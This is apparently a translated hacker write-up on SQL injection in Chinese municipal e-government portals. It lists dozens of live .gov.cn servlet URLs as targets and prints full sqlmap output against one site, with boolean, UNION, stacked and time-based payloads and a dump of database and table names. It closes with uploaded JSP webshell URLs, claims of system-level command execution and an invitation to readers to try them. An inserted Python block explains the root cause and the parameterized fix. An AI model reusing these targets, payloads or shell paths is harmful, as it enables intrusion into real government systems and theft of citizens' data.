http://egov.jingyan.gov.cn:8080/servlet/search?state=0
http://egov.lsszq.gov.cn:8080/servlet/search?state=0
http://egov.emeishan.gov.cn:8080/servlet/search?state=0
http://egov.eb.gov.cn:8080/servlet/search?state=0
http://egov.qwzw.gov.cn:8080/servlet/search?state=0
http://egov.jiajiang.gov.cn:8080/servlet/search?state=0
http://egov.muchuan.gov.cn:8080/servlet/search?state=0
http://egov.jkh.gov.cn:8080/servlet/search?state=0
http://egov.mabian.gov.cn:8080/servlet/search?state=0
http://egov.scnczw.gov.cn:8080/servlet/search?state=0
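All three injection points (qid on view and kbedit, state on search) share one root cause: an integer request parameter spliced into the SQL text. The Python below is an added example (not code from the original report or from the affected product, which is JSP on Microsoft SQL Server; sqlite3 stands in so it runs offline) showing the vulnerable lookup beside the fixed one. With concatenation, sqlmap's boolean probe from the output above changes the result set, which is exactly the oracle blind extraction relies on; with the value validated as an integer and bound as a parameter, the same input is refused before any SQL runs. The table name appears in the sqlmap output; its columns and rows are constructed.

```python
"""Root cause of the qid/state injections and the fix, side by side.

Added example, not code from the original report or the affected product.
sqlite3 stands in for Microsoft SQL Server; columns and rows are constructed.
"""
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE KB_QUESTION_ANSWER (qid INTEGER PRIMARY KEY, question TEXT, published INTEGER)"
    )
    conn.executemany(
        "INSERT INTO KB_QUESTION_ANSWER VALUES (?, ?, ?)",
        [(4, "Opening hours of the service hall", 1), (5, "Draft: internal note", 0)],
    )
    return conn


def lookup_concat(conn: sqlite3.Connection, qid: str) -> List[Tuple[int, str]]:
    """Vulnerable: the raw request parameter becomes part of the SQL text.

    Whatever follows the number is parsed as SQL, which is why the boolean
    probe qid=4 AND 2802=2802 is answered by the database, not rejected.
    """
    sql = "SELECT qid, question FROM KB_QUESTION_ANSWER WHERE published = 1 AND qid = " + qid
    return conn.execute(sql).fetchall()


def lookup_param(conn: sqlite3.Connection, qid: str) -> List[Tuple[int, str]]:
    """Fixed: validate the type at the edge, then bind the value.

    The SQL text is constant; the driver sends qid as data, never as syntax.
    In the JDBC original this is PreparedStatement.setInt on a '?' placeholder.
    """
    try:
        qid_int = int(qid)
    except ValueError:
        raise ValueError("qid must be an integer") from None
    sql = "SELECT qid, question FROM KB_QUESTION_ANSWER WHERE published = 1 AND qid = ?"
    return conn.execute(sql, (qid_int,)).fetchall()


def rejects(conn: sqlite3.Connection, qid: str) -> bool:
    """True when the fixed lookup refuses the parameter before any SQL runs."""
    try:
        lookup_param(conn, qid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    # The boolean probe from the sqlmap runs, and its false counterpart.
    print(lookup_concat(db, "4 AND 2802=2802"))  # row returned: condition true
    print(lookup_concat(db, "4 AND 2802=2803"))  # empty: the same row, now hidden
    print(rejects(db, "4 AND 2802=2802"))        # the fixed lookup refuses it
```

The difference between the two concatenated calls is the whole blind-injection oracle: one bit of information per request, decided by whether the row comes back. Binding the parameter removes the oracle rather than filtering it, which is why it holds up against all four technique types sqlmap listed.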
0x7
SQL injection 3
This injection point is a bit odd: when fed to sqlmap it clearly shows a 404 page, yet if you keep running it still produces results.
http://egov.zgdazw.gov.cn:8080/servlet/kbedit?qid=1
http://www.zljzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.rxzw.gov.cn:8080/servlet/kbedit?qid=1
http://egovrh.pzhzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.lzjyzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.hjxzwzx.gov.cn:8080/servlet/kbedit?qid=1
http://egov.naxi.gov.cn:8080/servlet/kbedit?qid=1
http://egov.glzwzx.gov.cn:8080/servlet/kbedit?qid=1
http://egov.ljzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.gyzwfw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.cxzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.lzzwfw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.jgzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.wangcangzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.gyybzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.gyctzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.qczw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.scsn.gov.cn:8080/servlet/kbedit?qid=1
http://egov.wtq.gov.cn:8080/servlet/kbedit?qid=1
http://egov.shawan.gov.cn:8080/servlet/kbedit?qid=1
http://egov.jingyan.gov.cn:8080/servlet/kbedit?qid=1
http://egov.lsszq.gov.cn:8080/servlet/kbedit?qid=1
http://egov.emeishan.gov.cn:8080/servlet/kbedit?qid=1
http://egov.eb.gov.cn:8080/servlet/kbedit?qid=1
http://egov.qwzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.jiajiang.gov.cn:8080/servlet/kbedit?qid=1
http://egov.muchuan.gov.cn:8080/servlet/kbedit?qid=1
http://egov.jkh.gov.cn:8080/servlet/kbedit?qid=1
http://egov.mabian.gov.cn:8080/servlet/kbedit?qid=1
http://egov.scnczw.gov.cn:8080/servlet/kbedit?qid=1
[root@Hacker~]# Sqlmap -u http://egov.mabian.gov.cn:8080/servlet/kbedit?qid=1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 03:08:01
[03:08:02] [INFO] testing connection to the target url
[03:08:02] [INFO] testing if the url is stable, wait a few seconds
[03:08:03] [INFO] url is stable
[03:08:03] [INFO] testing if GET parameter 'qid' is dynamic
sqlmap got a 302 redirect to 'http://egov.mabian.gov.cn:8080/servlet/../404.jsp'. Do you want to follow? [Y/n] y
[03:08:06] [INFO] confirming that GET parameter 'qid' is dynamic
[03:08:06] [INFO] GET parameter 'qid' is dynamic
[03:08:06] [WARNING] reflective value(s) found and filtering out
[03:08:06] [WARNING] heuristic test shows that GET parameter 'qid' might not be injectable
[03:08:06] [INFO] testing for SQL injection on GET parameter 'qid'
[03:08:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:08:07] [INFO] GET parameter 'qid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[03:08:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[03:08:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[03:08:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[03:08:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[03:08:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:08:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[03:08:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[03:08:19] [INFO] GET parameter 'qid' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[03:08:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[03:08:19] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[03:08:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[03:08:30] [INFO] GET parameter 'qid' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[03:08:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[03:08:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[03:08:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:08:35] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[03:08:36] [INFO] target url appears to have 13 columns in query
[03:08:40] [INFO] GET parameter 'qid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'qid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 63 HTTP(s) requests:
---
Place: GET
Parameter: qid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: qid=1 AND 7373=7373

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: qid=-9367 UNION ALL SELECT NULL, CHAR(58)+CHAR(115)+CHAR(102)+CHAR(103)+CHAR(58)+CHAR(110)+CHAR(68)+CHAR(72)+CHAR(76)+CHAR(101)+CHAR(109)+CHAR(114)+CHAR(122)+CHAR(79)+CHAR(87)+CHAR(58)+CHAR(112)+CHAR(101)+CHAR(116)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: qid=1; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: qid=1 WAITFOR DELAY '0:0:5'--
---
[03:08:48] [INFO] testing MySQL
[03:08:49] [WARNING] the back-end DBMS is not MySQL
[03:08:49] [INFO] testing Oracle
[03:08:49] [WARNING] the back-end DBMS is not Oracle
[03:08:49] [INFO] testing PostgreSQL
[03:08:50] [WARNING] the back-end DBMS is not PostgreSQL
[03:08:50] [INFO] testing Microsoft SQL Server
[03:08:50] [INFO] confirming Microsoft SQL Server
[03:08:52] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP, JSP 2.1
back-end DBMS: Microsoft SQL Server 2008
[03:08:52] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Rar$EX20.218\SQLMAP~1\Bin\output\egov.mabian.gov.cn'
[root@Hacker~]# Sqlmap -u http://egov.mabian.gov.cn:8080/servlet/kbedit?qid=1 --tables
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 03:09:56
[03:09:56] [INFO] resuming back-end DBMS 'microsoft sql server'
[03:09:56] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: qid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: qid=1 AND 7373=7373

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: qid=-9367 UNION ALL SELECT NULL, CHAR(58)+CHAR(115)+CHAR(102)+CHAR(103)+CHAR(58)+CHAR(110)+CHAR(68)+CHAR(72)+CHAR(76)+CHAR(101)+CHAR(109)+CHAR(114)+CHAR(122)+CHAR(79)+CHAR(87)+CHAR(58)+CHAR(112)+CHAR(101)+CHAR(116)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: qid=1; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: qid=1 WAITFOR DELAY '0:0:5'--
---
[03:09:56] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP, JSP 2.1
back-end DBMS: Microsoft SQL Server 2008
[03:09:56] [INFO] fetching database names
[03:09:57] [WARNING] reflective value(s) found and filtering out
[03:09:57] [INFO] the SQL query used returns 13 entries
[03:09:57] [INFO] retrieved: "Egh"
[03:09:57] [INFO] retrieved: "EghFiles"
[03:09:57] [INFO] retrieved: "master"
[03:09:57] [INFO] retrieved: "model"
[03:09:58] [INFO] retrieved: "msdb"
[03:09:58] [INFO] retrieved: "ReportServer"
[03:09:58] [INFO] retrieved: "ReportServerTempDB"
[03:09:58] [INFO] retrieved: "tempdb"
[03:09:59] [INFO] retrieved: "tyfocontent"
[03:09:59] [INFO] retrieved: "tyfoinvestigate"
[03:09:59] [INFO] retrieved: "tyfomsg"
[03:09:59] [INFO] retrieved: "tyfopublish"
[03:10:00] [INFO] retrieved: "tyfosearch"
[03:10:00] [INFO] fetching tables for databases: Egh, EghFiles, ReportServer, ReportServerTempDB, master, model, msdb, tempdb, tyfocontent, tyfoinvestigate, tyfomsg, tyfopublish, tyfosearch
[03:10:00] [INFO] the SQL query used returns 66 entries
[03:10:01] [INFO] retrieved: "dbo.AppProject"
[03:10:01] [INFO] retrieved: "dbo.Appraise"
[03:10:01] [INFO] retrieved: "dbo.BackUserPwd"
[03:10:02] [INFO] retrieved: "dbo.Complaints"
[03:10:02] [INFO] retrieved: "dbo.ConsultLabel"
[03:10:02] [INFO] retrieved: "dbo.ConvenienceCenter"
[03:10:03] [INFO] retrieved: "dbo.D99_Tmp"
[03:10:03] [INFO] retrieved: "dbo.data_file"
[03:10:03] [INFO] retrieved: "dbo.DateSet"
[03:10:04] [INFO] retrieved: "dbo.Datum"
[03:10:04] [INFO] retrieved: "dbo.datumlegend"
[03:10:04] [INFO] retrieved: "dbo.FlowSet"
[03:10:04] [INFO] retrieved: "dbo.FlowShip"
[03:10:05] [INFO] retrieved: "dbo.FlowTurnOut"
[03:10:05] [INFO] retrieved: "dbo.GscApproveConditionSet"
[03:10:05] [INFO] retrieved: "dbo.GscDay"
[03:10:06] [INFO] retrieved: "dbo.GscOrgan"
[03:10:06] [INFO] retrieved: "dbo.GscPubUser"
[03:10:06] [INFO] retrieved: "dbo.GscUser"
[03:10:09] [INFO] retrieved: "dbo.HandedData"
[03:10:09] [INFO] retrieved: "dbo.HandedDataFile"
[03:10:09] [INFO] retrieved: "dbo.KB_KEYWORD"
[03:10:09] [INFO] retrieved: "dbo.KB_QUESTION_ANSWER"
[03:10:10] [INFO] retrieved: "dbo.KB_SAME_KEY"
[03:10:10] [INFO] retrieved: "dbo.KB_WORD_QUESTION"
[03:10:10] [INFO] retrieved: "dbo.Label_UserPriority"
Not run to completion either; there are too many tables, and every site has this many, which is quite alarming.

0x8 Conclusion
Full server compromise
Every site is bizarre: the privileges are extremely high, and net user runs directly.
http://egov.fszw.cn:8080/questerOffLine/db4645f765d54f7398771141acb63515.jsp
Let's first use this site to see what the privileges look like:
One succeeded; let's try another:
http://egov.pzhzw.gov.cn:8080/questerOffLine/4358f2126aee44e4917310e0aade61d5.jsp
All of them succeed; try it if you don't believe me. That's it for this hole; I'll stop here.